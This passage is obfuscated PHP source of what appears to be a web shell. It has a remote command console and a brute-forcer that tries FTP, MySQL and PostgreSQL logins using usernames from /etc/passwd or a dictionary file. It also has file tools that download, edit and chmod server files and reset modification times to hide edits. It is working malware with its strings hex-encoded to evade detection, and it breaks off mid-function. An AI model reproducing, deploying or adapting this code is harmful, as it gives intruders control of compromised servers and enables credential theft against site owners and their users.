"\74\x73\x63\162\x69\x70\x74\76\xa\151\x66\x28\x77\151\156\x64\x6f\167\x2e\105\166\x65\x6e\164\x29\x20\167\x69\156\144\157\167\56\x63\141\160\x74\x75\162\x65\x45\166\x65\x6e\164\163\50\105\x76\x65\156\164\x2e\x4b\105\131\x44\x4f\127\116\51\73\12\166\x61\x72\40\143\x6d\144\163\x20\75\40\156\145\x77\x20\101\162\x72\141\x79\x28\x27\x27\51\73\xa\x76\x61\x72\40\x63\x75\162\x20\75\40\x30\x3b\12\146\x75\156\x63\164\x69\157\156\40\x6b\160\x28\x65\x29\x20\173\xa\x9\x76\x61\162\x20\x6e\40\75\40\50\x77\x69\x6e\x64\157\167\x2e\x45\166\145\156\x74\51\40\x3f\x20\145\x2e\x77\150\x69\x63\150\x20\72\40\x65\x2e\x6b\145\171\x43\x6f\144\145\x3b\12\11\151\146\50\156\40\75\x3d\x20\63\x38\x29\x20\173\xa\11\11\x63\165\x72\x2d\55\x3b\12\x9\x9\151\146\x28\143\165\x72\76\75\x30\x29\12\11\x9\11\144\x6f\x63\165\x6d\145\x6e\x74\56\143\146\56\143\x6d\x64\56\166\141\x6c\165\x65\40\75\40\x63\x6d\x64\x73\x5b\x63\165\x72\135\73\12\x9\11\x65\154\x73\145\12\x9\x9\11\x63\165\162\x2b\53\x3b\12\11\x7d\40\x65\x6c\x73\x65\x20\x69\146\50\x6e\x20\x3d\75\x20\64\60\x29\40\173\xa\x9\11\x63\165\x72\x2b\x2b\x3b\12\11\11\x69\x66\50\143\x75\x72\x20\x3c\x20\143\155\144\163\x2e\x6c\x65\x6e\x67\164\x68\51\12\11\11\x9\x64\x6f\143\165\x6d\145\x6e\164\56\143\x66\x2e\x63\155\144\x2e\x76\141\154\165\x65\40\x3d\40\143\155\144\163\x5b\x63\165\162\x5d\x3b\xa\11\x9\x65\x6c\163\x65\xa\11\x9\11\143\x75\162\x2d\55\73\12\x9\x7d\12\175\xa\146\x75\156\x63\164\x69\157\x6e\x20\x61\x64\144\x28\x63\155\x64\51\40\x7b\12\11\143\x6d\144\163\x2e\x70\x6f\x70\x28\51\x3b\12\x9\x63\155\144\x73\x2e\160\x75\163\150\50\143\155\x64\x29\73\xa\11\143\155\144\x73\56\x70\x75\163\x68\x28\x27\x27\x29\x3b\xa\11\x63\x75\x72\40\75\x20\143\155\144\x73\x2e\154\145\x6e\x67\164\x68\55\x31\x3b\xa\x7d\12\74\x2f\x73\143\x72\151\160\164\76"; echo "\74\x68\x31\x3e\x43\x6f\156\163\157\x6c\145\x3c\x2f\x68\61\x3e\74\144\151\x76\x20\x63\x6c\141\x73\x73\75\143\x6f\x6e\164\145\156\x74\x3e\74\x66\157\162\155\x20\x6e\x61\x6d\145\75\x63\146\40\x6f\156\x73\165\x62\155\151\164\x3d\x22\151\146\50\x64\x2e\143\x66\x2e\x63\x6d\x64\56\x76\x61\x6c\165\145\75\x3d\x27\143\x6c\x65\141\162\x27\x29\173\x64\56\143\146\56\x6f\165\x74\160\165\x74\56\x76\141\x6c\x75\x65\x3d\x27\47\x3b\144\x2e\x63\x66\x2e\x63\155\144\x2e\x76\141\x6c\165\145\x3d\47\x27\x3b\x72\145\x74\x75\162\x6e\40\x66\x61\x6c\163\145\x3b\x7d\141\144\x64\50\164\150\151\163\56\x63\x6d\144\x2e\166\141\154\165\145\51\x3b\151\146\50\x74\x68\x69\x73\56\141\152\141\x78\56\143\150\x65\x63\153\x65\x64\51\x7b\141\50\x6e\x75\x6c\x6c\x2c\x6e\165\x6c\x6c\54\x74\150\x69\x73\x2e\143\155\144\x2e\x76\141\x6c\x75\x65\x2c\x74\x68\151\163\56\163\150\x6f\x77\x5f\x65\162\162\x6f\162\163\56\x63\x68\145\143\x6b\145\144\77\x31\72\x27\x27\51\x3b\175\x65\x6c\163\145\x7b\x67\x28\x6e\165\x6c\x6c\54\156\x75\154\x6c\54\x74\x68\x69\x73\56\x63\x6d\x64\x2e\x76\x61\x6c\x75\x65\54\164\x68\151\x73\x2e\x73\x68\157\x77\137\x65\x72\162\x6f\162\x73\x2e\143\150\145\x63\153\145\144\77\61\72\47\x27\51\73\x7d\x20\x72\145\164\165\x72\156\x20\x66\x61\x6c\x73\145\x3b\42\76\74\x6c\141\142\145\x6c\76\x3c\x73\x65\x6c\145\x63\164\40\156\x61\x6d\x65\x3d\x61\x6c\x69\141\163\x3e"; foreach ($GLOBALS["\x61\x6c\x69\141\163\145\163"] as $n => $v) { if ($v == '') { echo "\x3c\157\x70\164\147\162\x6f\165\x70\40\154\x61\x62\x65\154\x3d\x22\55" . htmlspecialchars($n) . "\x2d\42\76\74\57\157\160\x74\147\162\x6f\165\x70\x3e"; continue; } echo "\x3c\x6f\160\164\x69\x6f\156\x20\x76\141\x6c\165\x65\75\42" . htmlspecialchars($v) . "\42\76" . $n . "\74\x2f\157\160\164\x69\x6f\156\76"; } echo "\74\57\163\145\154\145\x63\164\76\74\57\x6c\x61\142\145\154\x3e\74\x69\x6e\x70\165\164\x20\164\x79\160\145\x3d\142\165\x74\164\157\156\40\157\156\x63\154\x69\x63\x6b\x3d\x22\x61\144\x64\50\x64\x2e\x63\146\56\x61\x6c\151\141\163\x2e\x76\x61\x6c\x75\x65\x29\73\151\x66\50\x64\x2e\x63\x66\56\x61\x6a\x61\x78\x2e\x63\150\x65\143\x6b\145\144\51\173\x61\50\156\165\x6c\154\x2c\x6e\165\154\x6c\x2c\x64\x2e\143\x66\56\x61\x6c\151\141\163\x2e\x76\x61\x6c\165\x65\x2c\144\56\x63\x66\x2e\x73\150\x6f\167\x5f\x65\x72\x72\157\x72\163\56\x63\150\x65\143\153\145\x64\x3f\x31\72\x27\47\x29\73\x7d\x65\154\163\145\173\x67\x28\x6e\x75\x6c\154\54\x6e\x75\x6c\154\54\144\56\143\x66\56\141\154\x69\x61\x73\56\x76\x61\x6c\165\x65\54\x64\56\x63\146\x2e\x73\150\157\167\137\145\x72\x72\x6f\162\x73\x2e\x63\150\x65\143\x6b\145\144\x3f\x31\x3a\47\47\x29\73\175\x22\40\166\141\x6c\x75\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\76\x20\74\x6e\x6f\142\x72\x3e\x3c\151\x6e\160\x75\x74\x20\x74\x79\x70\145\75\143\x68\145\x63\153\142\157\x78\x20\x6e\x61\155\x65\x3d\x61\152\141\170\40\x76\x61\154\x75\145\x3d\61\x20" . (@$_COOKIE[md5($_SERVER["\110\124\124\x50\x5f\x48\117\x53\124"]) . "\x61\x6a\141\x78"] ? "\x63\150\x65\143\153\x65\144" : '') . "\x3e\x20\x73\x65\x6e\144\x20\165\163\151\156\x67\40\x41\x4a\101\x58\40\x3c\151\x6e\x70\165\164\40\164\x79\x70\x65\75\x63\x68\145\x63\153\142\x6f\170\x20\156\x61\155\145\x3d\163\x68\x6f\x77\x5f\145\162\162\157\162\x73\40\166\141\x6c\x75\145\75\61\x20" . (!empty($_POST["\160\62"]) || $_COOKIE[md5($_SERVER["\110\124\124\x50\137\110\x4f\x53\x54"]) . "\163\x74\144\x65\162\162\137\x74\157\137\157\x75\164"] ? "\143\150\145\x63\153\145\x64" : '') . "\76\40\162\x65\x64\151\x72\x65\x63\x74\x20\x73\164\x64\145\x72\x72\x20\x74\x6f\40\163\164\144\157\x75\164\40\x28\62\76\x26\61\x29\74\57\x6e\157\142\162\x3e\74\142\x72\57\x3e\x3c\x74\x65\x78\x74\141\162\145\x61\x20\143\x6c\x61\x73\x73\x3d\142\x69\147\141\x72\145\141\40\156\141\x6d\145\x3d\157\x75\164\x70\165\x74\x20\x73\x74\171\x6c\145\75\42\x62\x6f\x72\x64\x65\162\x2d\x62\157\x74\164\157\155\72\60\73\155\x61\x72\147\x69\156\x2d\x74\x6f\x70\x3a\x35\x70\x78\x3b\x22\40\x72\145\x61\144\157\156\154\x79\x3e"; if (!empty($_POST["\160\61"])) { echo htmlspecialchars("\x24\x20" . $_POST["\x70\x31"] . "\12" . ex($_POST["\x70\x31"])); } echo "\74\57\x74\x65\x78\x74\141\x72\145\141\x3e\74\x74\x61\x62\x6c\145\x20\163\164\171\154\x65\x3d\42\x62\x6f\x72\x64\145\x72\x3a\x31\x70\x78\40\163\157\154\151\x64\40\43\60\x36\60\x61\x31\x30\x3b\x62\x61\143\153\147\x72\x6f\x75\x6e\144\55\x63\157\154\x6f\162\72\43\x30\x36\60\141\x31\60\x3b\x62\157\162\144\x65\162\x2d\164\157\160\72\60\x70\170\x3b\x22\x20\143\x65\154\154\160\141\x64\x64\151\x6e\147\x3d\60\40\x63\x65\154\154\x73\x70\141\x63\151\156\x67\x3d\x30\40\167\151\144\164\150\x3d\42\61\60\60\x25\42\76\74\x74\x72\76\x3c\x74\144\40\163\164\x79\154\x65\75\x22\x70\141\x64\x64\151\156\x67\x2d\154\x65\146\164\x3a\64\x70\170\73\40\x77\x69\x64\x74\150\x3a\61\63\160\x78\73\42\76\44\x3c\57\x74\x64\76\74\x74\x64\76\74\151\156\160\165\x74\40\164\171\x70\145\x3d\164\x65\170\x74\40\156\x61\155\145\75\143\x6d\144\40\163\x74\171\x6c\x65\x3d\x22\142\157\x72\144\145\x72\x3a\60\x70\170\73\x77\x69\144\x74\x68\x3a\x31\x30\x30\45\x3b\42\x20\x6f\x6e\153\145\171\144\157\x77\156\x3d\x22\153\x70\x28\145\x76\145\156\164\51\73\42\x3e\74\x2f\164\144\x3e\x3c\57\x74\x72\x3e\74\x2f\164\x61\x62\154\145\x3e"; echo "\x3c\x2f\x66\x6f\162\x6d\76\74\57\x64\151\166\76\74\163\143\162\x69\x70\164\x3e\144\56\x63\146\x2e\x63\x6d\144\56\146\x6f\x63\165\163\50\x29\73\74\x2f\163\143\x72\151\160\x74\76"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["\x70\162\157\x74\x6f"])) { echo "\74\x68\61\x3e\122\145\x73\165\x6c\x74\163\x3c\57\150\x31\76\x3c\144\151\166\40\143\x6c\141\x73\163\75\143\x6f\x6e\164\x65\x6e\164\x3e\x3c\x73\x70\x61\x6e\x3e\124\171\160\145\x3a\x3c\57\x73\x70\141\156\76\x20" . htmlspecialchars($_POST["\160\x72\x6f\x74\157"]) . "\40\x3c\x73\x70\x61\156\x3e\123\145\162\166\x65\162\x3a\x3c\x2f\163\x70\x61\156\76\x20" . htmlspecialchars($_POST["\x73\x65\162\166\x65\162"]) . "\74\142\x72\76"; if ($_POST["\x70\x72\x6f\164\x6f"] == "\x66\x74\160") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["\160\162\x6f\x74\157"] == "\x6d\171\163\x71\154") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . "\72" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["\x70\x72\x6f\164\157"] == "\x70\147\x73\x71\x6c") { function bruteForce($ip, $port, $login, $pass) { $str = "\150\157\163\164\x3d\x27" . $ip . "\x27\x20\160\157\x72\x74\x3d\x27" . $port . "\47\x20\165\x73\x65\x72\75\x27" . $login . "\47\x20\160\141\163\163\x77\157\x72\144\75\x27" . $pass . "\47\40\144\142\x6e\141\155\145\x3d\x70\x6f\163\164\147\x72\x65\163"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode("\72", $_POST["\x73\145\x72\166\145\162"]); if ($_POST["\x74\x79\x70\x65"] == 1) { $temp = @file("\x2f\145\x74\x63\x2f\160\x61\x73\x73\x77\x64"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode("\72", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\74\x62\76" . htmlspecialchars($line[0]) . "\74\57\142\x3e\x3a" . htmlspecialchars($line[0]) . "\x3c\142\162\76"; } if (@$_POST["\x72\145\x76\145\x72\x73\145"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\x3c\142\76" . htmlspecialchars($line[0]) . "\x3c\57\x62\76\72" . htmlspecialchars($tmp); } } } } } elseif ($_POST["\x74\171\160\145"] == 2) { $temp = @file($_POST["\x64\151\143\x74"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["\154\x6f\147\151\156"], $line)) { $success++; echo "\x3c\142\76" . htmlspecialchars($_POST["\x6c\157\147\151\x6e"]) . "\x3c\x2f\142\x3e\x3a" . htmlspecialchars($line) . "\x3c\x62\162\x3e"; } } } } echo "\x3c\x73\160\141\156\76\101\164\x74\x65\155\160\164\x73\72\x3c\x2f\163\x70\141\x6e\76\x20{$attempts}\x20\74\x73\x70\141\156\x3e\x53\x75\x63\x63\x65\163\163\72\x3c\x2f\x73\x70\141\x6e\76\x20{$success}\74\57\x64\151\x76\x3e\74\142\x72\x3e"; } echo "\74\x68\61\76\x46\124\x50\x20\142\x72\165\x74\x65\x66\157\162\x63\145\74\57\x68\61\x3e\74\144\x69\166\x20\x63\x6c\141\x73\163\75\143\x6f\x6e\x74\145\156\x74\76\x3c\164\x61\x62\154\145\x3e\x3c\x66\x6f\162\x6d\x20\x6d\145\164\150\x6f\x64\x3d\160\157\163\164\x3e\74\x74\162\76\x3c\x74\x64\x3e\x3c\x73\x70\141\x6e\x3e\124\x79\160\x65\x3c\57\x73\x70\x61\156\76\74\x2f\x74\x64\x3e" . "\74\164\144\x3e\x3c\154\141\142\145\154\76\x3c\x73\145\x6c\145\143\164\x20\156\x61\155\145\75\x70\162\157\164\x6f\76\74\x6f\x70\x74\x69\x6f\x6e\40\166\x61\x6c\x75\x65\75\x66\164\160\x3e\106\124\120\x3c\57\157\160\x74\x69\157\x6e\x3e\x3c\x6f\x70\x74\x69\x6f\156\x20\x76\x61\x6c\x75\x65\x3d\155\x79\x73\x71\154\x3e\x4d\x79\x53\161\154\74\x2f\x6f\160\164\151\x6f\x6e\76\x3c\x6f\x70\x74\x69\x6f\x6e\x20\166\x61\154\165\145\75\x70\x67\x73\161\x6c\76\120\x6f\x73\x74\x67\162\145\123\x71\x6c\74\x2f\157\x70\164\x69\x6f\156\76\74\x2f\163\145\x6c\145\143\164\x3e\x3c\57\x6c\x61\142\145\x6c\76\x3c\57\x74\144\76\x3c\x2f\164\x72\x3e\74\164\x72\76\74\x74\x64\76" . "\x3c\151\x6e\160\165\x74\40\x74\171\x70\x65\75\150\x69\144\x64\145\x6e\40\156\x61\155\145\x3d\x63\40\x76\x61\154\165\x65\x3d\x22" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\x22\x3e" . "\x3c\x69\x6e\x70\x75\164\40\164\171\160\145\x3d\x68\151\x64\144\x65\156\x20\156\141\155\145\75\x61\40\166\x61\x6c\x75\x65\75\x22" . htmlspecialchars($_POST["\x61"]) . "\42\x3e" . "\x3c\151\156\160\165\164\40\164\x79\160\145\x3d\x68\x69\x64\x64\145\x6e\x20\x6e\x61\x6d\145\75\143\x68\x61\x72\163\x65\164\40\166\x61\x6c\x75\x65\75\x22" . htmlspecialchars($_POST["\143\150\x61\x72\163\x65\x74"]) . "\x22\76" . "\74\x69\x6e\x70\x75\x74\40\164\x79\160\145\x3d\x68\151\144\144\x65\x6e\x20\156\141\x6d\x65\75\156\145\x20\x20\166\x61\154\165\x65\x3d\42\x22\76" . "\x3c\x73\160\141\156\76\x53\145\x72\x76\x65\x72\x3a\x70\157\162\164\x3c\x2f\x73\x70\x61\x6e\x3e\x3c\57\164\x64\x3e" . "\x3c\164\x64\x3e\x3c\x69\156\160\165\164\x20\x74\x79\x70\145\x3d\164\x65\170\x74\40\x6e\x61\155\145\x3d\163\x65\x72\166\x65\162\x20\x76\x61\x6c\165\x65\75\42\61\x32\x37\56\x30\56\x30\x2e\61\x22\x3e\74\57\164\144\76\74\x2f\164\x72\x3e" . "\74\164\x72\x3e\x3c\164\144\x3e\74\x73\x70\x61\156\x3e\x42\x72\165\164\145\x20\164\x79\x70\x65\x3c\57\163\x70\141\156\x3e\x3c\57\x74\x64\x3e" . "\x3c\x74\144\x3e\x3c\x69\x6e\160\165\x74\40\164\171\160\x65\75\162\141\144\x69\x6f\40\156\x61\155\145\x3d\x74\x79\x70\x65\40\x76\141\154\165\x65\75\42\61\x22\x20\x63\150\145\x63\x6b\145\x64\76\x20\57\x65\x74\x63\57\160\x61\x73\x73\x77\x64\x3c\x2f\x74\144\x3e\x3c\57\164\162\76" . "\74\164\x72\x3e\x3c\164\144\76\x3c\x2f\164\x64\76\x3c\164\144\40\x73\x74\x79\x6c\x65\x3d\42\160\x61\144\144\151\156\147\x2d\154\x65\x66\x74\72\x31\65\160\x78\42\76\x3c\151\x6e\160\x75\x74\x20\x74\171\160\x65\75\x63\x68\x65\x63\153\142\157\x78\40\156\x61\155\145\75\162\145\166\145\162\x73\145\40\x76\141\x6c\x75\145\x3d\61\40\143\x68\145\143\153\x65\x64\76\x20\162\145\x76\145\162\x73\x65\40\50\154\x6f\147\x69\x6e\x20\x2d\x3e\x20\x6e\151\x67\157\154\x29\74\57\164\x64\76\74\57\x74\x72\76" . "\x3c\x74\x72\76\74\164\144\76\x3c\x2f\164\x64\76\x3c\164\144\76\x3c\151\x6e\x70\165\164\40\164\x79\160\145\75\162\141\x64\151\157\x20\x6e\x61\155\x65\75\164\171\x70\x65\40\166\141\154\165\145\x3d\42\x32\x22\x3e\x20\104\x69\x63\164\x69\157\x6e\x61\162\x79\74\57\164\144\x3e\74\57\164\162\76" . "\74\164\x72\x3e\x3c\164\x64\76\x3c\x2f\x74\144\x3e\x3c\x74\144\76\x3c\164\141\x62\x6c\x65\x20\x73\x74\171\154\x65\75\42\160\x61\x64\144\x69\x6e\x67\x2d\154\145\x66\164\x3a\61\x35\160\170\x22\76\x3c\164\x72\x3e\x3c\164\x64\76\74\163\160\141\x6e\76\114\x6f\147\x69\156\74\x2f\163\160\x61\156\76\x3c\x2f\x74\x64\x3e" . "\x3c\164\144\x3e\x3c\x69\156\x70\x75\x74\x20\x74\171\160\145\x3d\164\x65\170\164\x20\156\x61\x6d\x65\x3d\x6c\x6f\147\x69\156\x20\x76\x61\x6c\165\145\75\42\162\157\x6f\164\x22\x3e\74\x2f\164\x64\76\x3c\x2f\x74\x72\76" . "\x3c\164\x72\x3e\x3c\164\144\76\x3c\163\x70\141\156\76\104\x69\143\164\x69\157\156\x61\162\x79\x3c\57\163\x70\141\156\x3e\x3c\x2f\164\x64\x3e" . "\74\x74\144\76\74\151\x6e\x70\x75\x74\40\x74\171\160\145\x3d\164\x65\170\164\x20\156\141\x6d\145\x3d\144\151\x63\x74\40\x76\x61\154\x75\x65\75\42" . htmlspecialchars($GLOBALS["\143\167\144"]) . "\160\x61\163\x73\x77\144\x2e\144\151\x63\x22\x3e\x3c\x2f\x74\144\x3e\74\57\x74\162\76\74\x2f\164\x61\142\154\x65\76" . "\x3c\57\164\144\76\74\57\164\x72\76\74\164\x72\76\74\164\144\76\74\57\x74\x64\x3e\74\x74\x64\76\x3c\x69\156\160\x75\x74\40\x74\171\x70\145\x3d\163\165\x62\155\151\x74\40\x76\x61\x6c\x75\x65\75\x22\163\165\x62\155\x69\164\42\76\74\57\164\144\x3e\74\x2f\x74\162\x3e\x3c\x2f\x66\157\x72\x6d\76\x3c\x2f\164\141\x62\154\145\x3e"; echo "\74\x2f\x64\151\x76\76"; hardFooter(); } goto hgt_8; n9j03: function hardScandir($dir) { if (function_exists("\x73\143\141\156\x64\x69\x72")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto iBn85; mdCfK: @define("\126\105\122\123\111\x4f\x4e", "\64\x2e\x32\56\x35"); goto PnC_E; MQqk2: function actionFilesTools() { if (isset($_POST["\x70\61"])) { $_POST["\160\x31"] = urldecode($_POST["\160\x31"]); } if (@$_POST["\160\x32"] == "\144\x6f\167\156\x6c\157\141\144") { if (@is_file($_POST["\x70\x31"]) && @is_readable($_POST["\x70\61"])) { ob_start("\157\142\x5f\x67\x7a\x68\141\x6e\x64\x6c\x65\x72", 4096); header("\x43\x6f\156\164\145\x6e\x74\55\104\x69\163\160\157\x73\x69\164\151\157\156\x3a\40\141\x74\164\x61\x63\150\x6d\145\x6e\164\x3b\40\146\151\154\x65\156\x61\x6d\x65\75" . basename($_POST["\160\61"])); if (function_exists("\x6d\x69\x6d\145\137\143\157\156\x74\145\x6e\x74\137\164\171\x70\x65")) { $type = @mime_content_type($_POST["\x70\61"]); header("\x43\x6f\156\164\145\156\x74\55\124\171\160\145\72\x20" . $type); } else { header("\x43\x6f\x6e\164\145\156\x74\55\x54\171\x70\x65\x3a\40\141\160\x70\x6c\151\x63\x61\164\151\x6f\x6e\x2f\157\143\x74\x65\164\55\x73\x74\x72\x65\141\x6d"); } $fp = @fopen($_POST["\x70\x31"], "\x72"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["\x70\62"] == "\x6d\153\x66\151\154\x65") { if (!file_exists($_POST["\x70\x31"])) { $fp = @fopen($_POST["\x70\x31"], "\x77"); if ($fp) { $_POST["\160\62"] = "\145\x64\151\x74"; fclose($fp); } } } hardHeader(); echo "\x3c\150\x31\x3e\x46\151\154\x65\x20\164\x6f\157\154\163\74\57\x68\61\76\x3c\144\151\166\x20\143\x6c\141\x73\163\x3d\x63\157\x6e\x74\145\156\164\76"; if (!file_exists(@$_POST["\x70\x31"])) { echo "\x46\151\x6c\145\x20\156\x6f\x74\x20\x65\170\151\163\x74\x73"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["\160\x31"])); if (!$uid) { $uid["\x6e\141\x6d\x65"] = @fileowner($_POST["\160\61"]); $gid["\x6e\x61\x6d\x65"] = @filegroup($_POST["\x70\61"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["\160\x31"])); } echo "\x3c\163\160\141\x6e\76\x4e\141\155\x65\x3a\74\x2f\x73\160\141\156\76\x20" . htmlspecialchars(@basename($_POST["\x70\x31"])) . "\40\74\163\x70\x61\156\76\x53\151\x7a\x65\x3a\74\57\163\x70\141\x6e\x3e\40" . (is_file($_POST["\160\61"]) ? viewSize(filesize($_POST["\160\x31"])) : "\55") . "\40\x3c\x73\x70\x61\156\x3e\x50\145\162\x6d\x69\163\163\151\157\x6e\72\74\57\163\160\x61\x6e\76\40" . viewPermsColor($_POST["\x70\61"]) . "\x20\x3c\x73\160\x61\156\x3e\x4f\x77\156\x65\162\x2f\107\x72\157\165\x70\x3a\74\57\163\160\141\156\76\x20" . $uid["\x6e\141\155\x65"] . "\57" . $gid["\156\x61\x6d\145"] . "\x3c\x62\x72\76"; echo "\x3c\x73\x70\141\156\x3e\x43\x72\x65\x61\x74\x65\x20\x74\x69\x6d\x65\72\x3c\x2f\163\160\141\156\76\40" . date("\x59\x2d\x6d\x2d\x64\40\110\x3a\151\x3a\x73", filectime($_POST["\160\61"])) . "\x20\x3c\163\x70\141\156\76\x41\143\143\145\x73\x73\40\x74\151\155\x65\x3a\x3c\57\163\160\141\156\x3e\x20" . date("\131\x2d\x6d\x2d\144\40\x48\x3a\x69\x3a\163", fileatime($_POST["\160\61"])) . "\40\x3c\x73\x70\141\156\76\115\x6f\x64\x69\146\171\40\164\x69\155\145\72\74\x2f\163\x70\141\x6e\76\x20" . date("\x59\55\155\55\x64\x20\110\72\x69\72\x73", filemtime($_POST["\160\61"])) . "\74\142\162\x3e\74\142\x72\x3e"; if (empty($_POST["\x70\x32"])) { $_POST["\x70\62"] = "\x76\x69\145\x77"; } if (is_file($_POST["\160\x31"])) { $m = array("\126\x69\x65\167", "\110\x69\x67\150\154\151\147\x68\x74", "\x44\157\167\156\154\157\141\144", "\110\x65\170\144\x75\x6d\x70", "\105\144\151\164", "\103\x68\x6d\157\x64", "\122\x65\156\x61\155\145", "\124\157\x75\x63\150", "\x46\x72\141\x6d\145"); } else { $m = array("\103\x68\x6d\157\x64", "\122\145\156\141\x6d\x65", "\x54\157\x75\143\150"); } foreach ($m as $v) { echo "\74\141\x20\x68\162\x65\146\x3d\x23\40\157\x6e\x63\154\151\x63\x6b\75\x22\x67\x28\x6e\x75\x6c\154\x2c\x6e\x75\154\x6c\x2c\47" . urlencode($_POST["\x70\61"]) . "\x27\x2c\x27" . strtolower($v) . "\x27\x29\x22\x3e" . (strtolower($v) == @$_POST["\160\x32"] ? "\74\x62\76\133\40" . $v . "\x20\x5d\x3c\x2f\x62\76" : $v) . "\74\57\141\x3e\x20"; } echo "\74\x62\162\76\x3c\x62\x72\76"; switch ($_POST["\160\62"]) { case "\x76\x69\145\x77": echo "\x3c\x70\x72\145\x20\x63\154\x61\x73\x73\75\x6d\x6c\61\76"; $fp = @fopen($_POST["\160\61"], "\x72"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\x3c\57\160\162\x65\x3e"; break; case "\x68\151\147\150\154\x69\147\150\164": if (@is_readable($_POST["\160\x31"])) { echo "\x3c\144\x69\166\40\143\154\x61\163\163\75\155\x6c\x31\40\163\164\171\154\145\x3d\42\x62\x61\143\153\x67\162\157\x75\x6e\144\x2d\143\157\154\x6f\162\x3a\x20\x23\145\61\145\x31\145\61\73\143\x6f\x6c\x6f\162\72\x62\x6c\x61\x63\x6b\73\x22\76"; $oRb = @highlight_file($_POST["\160\x31"], true); echo str_replace(array("\x3c\163\x70\x61\x6e\x20", "\74\57\163\x70\141\156\x3e"), array("\74\x66\157\156\164\x20", "\x3c\x2f\146\x6f\x6e\164\76"), $oRb) . "\74\x2f\144\x69\x76\76"; } break; case "\143\x68\155\157\x64": if (!empty($_POST["\x70\63"])) { $perms = 0; for ($i = strlen($_POST["\x70\x33"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\x70\63"][$i] * pow(8, strlen($_POST["\x70\x33"]) - $i - 1); } if (!@chmod($_POST["\x70\61"], $perms)) { echo "\103\141\156\x27\x74\x20\163\x65\x74\40\x70\145\162\x6d\x69\163\163\x69\x6f\x6e\163\x21\74\x62\x72\x3e\x3c\x73\143\x72\151\x70\164\x3e\144\157\x63\x75\x6d\145\156\x74\x2e\155\146\56\160\x33\x2e\x76\141\x6c\165\x65\x3d\42\42\x3b\x3c\57\163\143\162\x69\160\x74\x3e"; } } clearstatcache(); echo "\x3c\163\x63\162\151\160\164\76\x70\x33\x5f\x3d\42\x22\73\x3c\57\x73\x63\162\151\160\164\76\74\146\157\162\155\x20\157\x6e\x73\165\x62\x6d\151\164\x3d\42\147\50\156\x75\154\x6c\x2c\x6e\x75\154\x6c\54\47" . urlencode($_POST["\160\61"]) . "\x27\54\156\165\154\x6c\x2c\164\x68\151\x73\56\143\150\155\157\144\x2e\x76\x61\x6c\165\x65\51\73\162\x65\164\x75\162\156\40\x66\141\154\x73\145\x3b\42\76\74\x69\156\x70\x75\x74\x20\164\x79\x70\x65\75\x74\x65\x78\x74\40\x6e\x61\155\145\x3d\143\150\155\x6f\144\40\166\141\x6c\165\x65\75\x22" . substr(sprintf("\x25\157", fileperms($_POST["\160\61"])), -4) . "\42\x3e\x3c\151\156\x70\x75\164\40\x74\x79\160\x65\x3d\x73\x75\142\x6d\151\164\40\166\141\x6c\165\x65\x3d\42\163\165\x62\x6d\151\164\42\76\74\x2f\x66\157\162\x6d\76"; break; case "\145\x64\151\164": if (!is_writable($_POST["\x70\x31"])) { echo "\x46\151\154\x65\40\x69\x73\x6e\x27\x74\x20\x77\x72\151\x74\x65\141\142\x6c\145"; break; } if (!empty($_POST["\x70\63"])) { $time = @filemtime($_POST["\160\61"]); $_POST["\x70\63"] = substr($_POST["\160\63"], 1); $fp = @fopen($_POST["\160\x31"], "\x77"); if ($fp) { @fwrite($fp, $_POST["\160\63"]); @fclose($fp); echo "\123\x61\x76\x65\x64\41\x3c\142\162\76\74\163\143\162\151\160\164\76\x70\63\137\75\42\x22\73\74\57\x73\x63\x72\151\x70\164\76"; @touch($_POST["\x70\61"], $time, $time); } } echo "\x3c\x66\157\162\155\x20\157\156\163\165\142\x6d\151\164\75\42\147\x28\156\x75\154\154\54\156\x75\x6c\x6c\x2c\x27" . urlencode($_POST["\160\61"]) . "\x27\x2c\x6e\x75\154\x6c\54\47\x31\47\x2b\x74\150\151\163\56\164\x65\x78\164\x2e\166\x61\x6c\x75\x65\51\x3b\x72\x65\x74\165\x72\x6e\x20\146\x61\154\x73\145\73\x22\76\x3c\164\x65\170\x74\141\162\x65\141\40\156\x61\155\145\x3d\x74\x65\170\164\40\x63\x6c\141\163\x73\x3d\x62\151\147\141\162\145\141\76"; $fp = @fopen($_POST["\160\61"], "\162"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\x3c\x2f\164\145\x78\164\141\x72\x65\x61\x3e\74\x69\x6e\x70\x75\164\x20\164\171\x70\145\x3d\163\x75\142\155\x69\x74\x20\x76\x61\x6c\x75\145\75\x22\163\165\x62\155\x69\164\42\x3e\x3c\x2f\146\x6f\162\155\x3e"; break; case "\x68\145\170\144\x75\155\160": $c = @file_get_contents($_POST["\160\x31"]); $n = 0; $h = array("\60\60\60\x30\x30\60\60\60\x3c\x62\162\x3e", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\x25\x30\x32\x58", ord($c[$i])) . "\x20"; switch (ord($c[$i])) { case 0: $h[2] .= "\x20"; break; case 9: $h[2] .= "\40"; break; case 